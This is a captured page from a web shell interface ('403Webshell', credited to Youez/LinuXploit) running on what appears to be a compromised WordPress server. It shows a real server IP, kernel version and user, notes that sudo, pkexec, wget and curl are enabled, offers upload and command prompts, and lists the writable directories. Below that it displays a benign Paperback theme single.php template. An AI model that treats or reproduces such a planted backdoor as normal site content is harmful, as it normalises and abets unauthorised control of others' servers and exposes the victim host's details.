403Webshell
Server IP : 65.108.144.40  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User : dev ( 1000)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/alongwineroad/wp-content/themes/paperback/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/alongwineroad/wp-content/themes/paperback/single.php
<?php
/**
 * The Template for displaying all single posts.
 *
 * @package Paperback
 */

get_header();

$comment_style = get_option( 'paperback_comment_style', 'click' );

if ( comments_open() ) {
	$comments_status = 'open';
} else {
	$comments_status = 'closed';
}
?>

	<div id="primary" class="content-area">
		<main id="main" class="site-main" role="main">

		<?php while ( have_posts() ) : the_post();

			// Move Jetpack share links below author box
			if ( function_exists( 'sharing_display' ) && ! function_exists( 'dsq_comment' ) ) {
				remove_filter( 'the_content', 'sharing_display', 19 );
				remove_filter( 'the_excerpt', 'sharing_display', 19 );
			}

			// Post content template
			get_template_part( 'template-parts/content' );

			// Author profile box
			paperback_author_box();

			// Related Posts
			if ( class_exists( 'Jetpack_RelatedPosts' ) ) {
				echo do_shortcode( '[jetpack-related-posts]' );
			} ?>

			<!-- Comment toggle and share buttons -->
			<div class="share-comment <?php echo esc_attr( $comment_style ); ?>">

				<?php if ( function_exists( 'sharing_display' ) ) { ?>
					<div class="share-icons <?php echo esc_attr( $comments_status ); ?>">
						<?php echo sharing_display(); ?>
					</div>
				<?php } ?>

				<?php if ( comments_open() ) { ?>
					<a class="comments-toggle button" href="#">
						<span><i class="fa fa-comments"></i>
							<?php if ( '0' != get_comments_number() ) {
								esc_html_e( 'Show comments', 'paperback' );
							} else {
								esc_html_e( 'Leave a comment', 'paperback' );
							} ?>
						</span>
						<span><i class="fa fa-times"></i> <?php esc_html_e( 'Hide comments', 'paperback' ); ?></span>
					</a>
				<?php } ?>
			</div>

			<?php // Comments template
			comments_template();

		endwhile; ?>

		</main><!-- #main -->
	</div><!-- #primary -->

	<?php get_sidebar();

get_footer(); ?>

Youez - 2016 - github.com/yon3zu
LinuXploit